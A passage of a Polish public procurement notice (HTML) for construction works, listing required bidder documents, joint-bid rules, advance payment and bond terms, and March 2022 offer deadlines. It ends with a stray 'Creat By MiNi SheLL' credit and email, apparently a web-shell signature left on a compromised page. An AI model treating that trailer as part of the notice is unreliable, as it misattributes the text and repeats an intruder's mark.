załączeniem dowodów określających<br/>czy te roboty budowlane zostały wykonane należycie,<br/>w celu potwierdzenia spełnienia warunku udziału w<br/>postępowaniu, o którym mowa w rozdz. VIII ust.1.pkt.<br/>1);<br/>2) Wykaz osób , skierowanych przez wykonawcę<br/>do realizacji zamówienia, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę<br/>jakości lub kierowanie robotami budowlanymi wraz z<br/>informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień , doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia , a także<br/>zakresu wykonywanych przez nie czynności, oraz<br/>informacją o podstawie do dysponowania tymi<br/>osobami, w celu potwierdzenia spełnienia warunku<br/>udziału w postepowaniu, o którym mowa w rozdz. VIII<br/>ust.1.pkt. 2) SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenia wykonawcy, w zakresie art. 108 ust.<br/>1 pkt 5 ustawy Prawo zamówień publicznych, o<br/>braku przynależności do tej samej grupy kapitałowej<br/>w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów (Dz. U. z 2020<br/>r. poz. 1076 i 1086), z innym wykonawcą, który<br/>złożył odrębną ofertę, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz<br/>z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego<br/>wykonawcy należącego do tej samej grupy<br/>kapitałowej;.<br/>Wzór oświadczenia stanowi załącznik 8 do SWZ.<br/>Zobowiązanie podmiotu udostępniającego zasoby<br/>do oddania mu do dyspozycji niezbędnych zasobów<br/>na potrzeby realizacji zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych<br/>podmiotów.<br/>Wzór pisemnego zobowiązania stanowi załącznik 4<br/>do SWZ - jesli dotyczy.Oświadczenie wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia.<br/>Wzór pisemnego zobowiązania stanowi załącznik 5<br/>do SWZ.-jesli dotyczy.Odpis lub informacja z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego<br/>rejestru .<br/>Wykonawca nie jest zobowiązany do złożenia ww.<br/>dokumentów, jeżeli zamawiający może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych bazdanych, o ile wykonawca wskazał dane<br/>umożliwiające dostęp do tych dokumentów.<br/>Pełnomocnictwa lub innego dokumentu<br/>potwierdzającego umocowanie do reprezentowania<br/>wykonawcy. Wymóg powyższy ma zastosowanie<br/>odpowiednio do osoby działającej w imieniu<br/>wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia<br/>umowy w sprawie<br/>zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa<br/>w Rozdziale X SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego<br/>wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy wzór stanowi<br/>załącznik nr 5<br/>SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający przewiduje na wniosek wykonawcy, udzielenie jednorazowej zaliczki na poczet<br/>wykonania zamówienia, w wysokości 5% całkowitego wynagrodzenia umownego brutto. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego<br/>na warunkach<br/>określonych we Wzorze Umowy, stanowiącym Załącznik nr 9 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem<br/>zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie<br/>uregulowanym w art. 454-455 PZP oraz wskazanym we Wzorze Umowy, stanowiącym<br/>Załącznik nr 9 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy<br/>pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platforma zakupowa.pl pod adresem : https://platformazakupowa.pl/sp_nowasol w myśl ustawy Pzp na stronie internetowej prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-18 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> termin zakończenia realizacji przedmiotu zamówienia to 9 miesięcy. Zamawiający wskazał konkretną datę w ogłoszeniu , ponieważ inwestycja jest dofinansowana ze środków Rządowego Funduszu Inwestycji Lokalnych w ramach Funduszu Przeciwdziałania COVID-19.W związku z powyższym jest to inwestycja na którą środki muszą być wykorzystane do końca trwania programu.

Creat By MiNi SheLL
Email: jattceo@gmail.com